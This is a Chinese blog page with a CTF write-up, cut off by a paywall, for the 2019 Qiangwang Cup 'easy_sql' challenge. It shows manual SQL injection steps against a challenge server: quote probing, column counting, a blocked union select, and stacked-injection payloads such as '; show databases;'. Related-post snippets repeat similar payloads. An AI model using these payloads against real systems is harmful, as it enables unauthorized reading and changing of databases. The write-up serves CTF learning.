WriteUp_easy_sql_堆叠注入_强网杯2019

最新推荐文章于 2024-06-18 09:47:40 发布
最新推荐文章于 2024-06-18 09:47:40 发布
阅读量933 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c1ata/article/details/105606484
版权
本文详细介绍了在强网杯2019中遇到的一个堆叠注入问题的解题过程。首先通过单引号试错确定为GET型SQL注入,接着尝试联合查询但因关键字过滤受阻。然后,利用堆叠注入技术,通过分号执行多条SQL语句,依次完成查询所有数据库、显示所有表及表结构等操作,最终揭示了如何通过改变默认查询表来获取关键信息。
摘要由CSDN通过智能技术生成

题目描述

随便注

image-20200418204903022

解题过程

查看源码,发现应该不适合sqlmap自动化注入,该题应该是让你手工注入;

<!-- sqlmap是没有灵魂的 -->
<form method="get">
    姿势: <input type="text" name="inject" value="1">
    <input type="submit">
</form>

在表单中加入单引号'试错,发现SQL语法错误

http://159.138.137.79:53698/?inject=1'

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at

这说明为GET型SQL注入漏洞。考虑联合注入;

判断列数

  • 采用order by
    http://159.138.137.79:53698/?inject=1' and 1=2 order by 3 --+
  • 经判断列数为2

尝试通过联合查询,查询有用信息

http://159.138.137.79:53698/?inject=1' and 1=2 union select database(),user() --+

发现某些关键字被过滤

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

这样我们便不能通过联合查询进行注入了。

这时考虑堆叠注入

使用分号结束上一个语句再叠加其他语句一起执行;

查询所有数据库

http://159.138.137.79:53698/?inject=1' and 1=2; show databases;--+

array(1) {
   
  [0]=>
  string(11)
最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
【BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 “ 注:在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便注 Writeup(超级详细)
StevenOnesir的博客
11-23 1118
这道题应该算是非常熟悉、经典且基础的一道题目,在攻防世界、Buu等平台上非常常见,适合作为sql注入的入门学习题目。 作者说了一句:开发和安全缺一不可。这也是我想说的。 废话不多说,步入正题。 首先进入界面我们可以看到一个输入框,结合题目信息我们可以判断这就是注入点。 我们先输入: 1’ 尝试一下。 果然出现了回显报错: error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your
掌握数据处理新利器:Easy SQL
最新发布
gitblog_00022的博客
06-18 332
掌握数据处理新利器:Easy SQL 项目地址:https://gitcode.com/easysql/easy_sql 在大数据时代,数据提取(Extract)、转换(Transform)和加载(Load,简称ETL)是不可或缺的关键步骤。现在,有一个名为Easy SQL的开源项目,它旨在简化这个过程,让你以一种命令式的方式编写SQL进行ETL工作。基于标准SQL并添加了简单的新语法,你可以一步...
[强网杯]easy_sql
fightte的博客
05-17 991
提交1和2会回显一个数组: 相当于1对应的值为“hahahah” 是key-value形式的输出。 尝试输入1’.返回报错,有注入漏洞 尝试1’or 1=1#,并用#截断,输出了三个数组: 尝试堆叠注入,即注入多组sql语句,其中有;隔开, 输入show databases返回了所有的数据表, 尝试查询表名:show tables; 显示了表的名字,在使用sql语句,show columns from xx,来查询其中列的名称: 上图是word的列名, 下图,再查出1919…中的列名: 用sql
记录一次easy_sql堆叠注入
Aiwin的博客
05-25 229
easy_sql堆叠注入
[SUCTF 2019]EasySQL
m0_62092622的博客
04-11 2742
​ 这题打开就是一个输入并说能帮我判断输入的flag的对错 然后想到[强网杯 2019]随便注跟这个题长得很像,是使用的堆叠注入 那么就试一下堆叠注入 1;show tables; Array ( [0] => 1 ) Array ( [0] => Flag ) 可是输入1;show columns from Flag查询表格内容的时候竟然出现Nonono. 那就索性fuzz查一下都哪些词被过滤了 import requests url = "http://0f2d22cb-56bf-4
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
ADS Writeup_2_ads_
10-02
在“Advanced Data Structure Writeup_2_ads_”这个主题中,我们主要探讨的是高级数据结构的相关概念、应用和实现。数据结构是计算机科学中的一个重要领域,它研究如何组织和存储数据,以便更有效地进行访问和操作。...
writeup_knkl_
09-30
【标题】"writeup_knkl_" 暗示了这是一个关于技术分析或漏洞报告的文档,其中"knkl"可能是某种缩写,可能代表一个特定的技术、工具或概念。由于描述部分"Raghav abnsaklfmleamafl;emgl;aeg"看起来像是随机字符序列,...
ADS Writeup_ads_
10-03
堆是一种特殊的树形数据结构,满足堆属性:父节点的键值总是大于或小于其子节点(最大堆/最小堆)。堆常用于优先队列的实现,以及排序算法(如堆排序)。 **九、跳跃表** 跳跃表是一种概率数据结构,用于快速查找...
ADS Writeup_1_ads_
09-29
《高级数据结构解析1》(ADS Writeup_1)是一篇深入探讨高级数据结构的分析报告,主要聚焦于这些结构在计算机科学中的重要性、应用以及优化策略。数据结构是编程和算法设计的基础,它影响着程序的效率、可读性和可...
[极客大挑战2019] EasySQL
w_dnmd_____的博客
03-18 385
[强网杯 2019]随便注 这题是写给自己看的,记录一下自己sql注入的学习历程,看了别人的博客,总结了一下自己的知识查看大佬操作 首先是涉及到的点,因为写过一次,这次是总结知识点 **1.**堆叠注入 该题用到堆叠注入,何为堆叠注入?顾名思义,即将多个sql语句结合起来,同时注入,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如: select *from users;show databases; 意思就是查询表的时候同时查询数据库 至于为什
easy_sql
2301_79442654的博客
01-27 294
wllm=-1 ' union select 1, 2, user() -- '所以,库名:test_db。
Easysql
weixin_43610673的博客
03-04 728
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值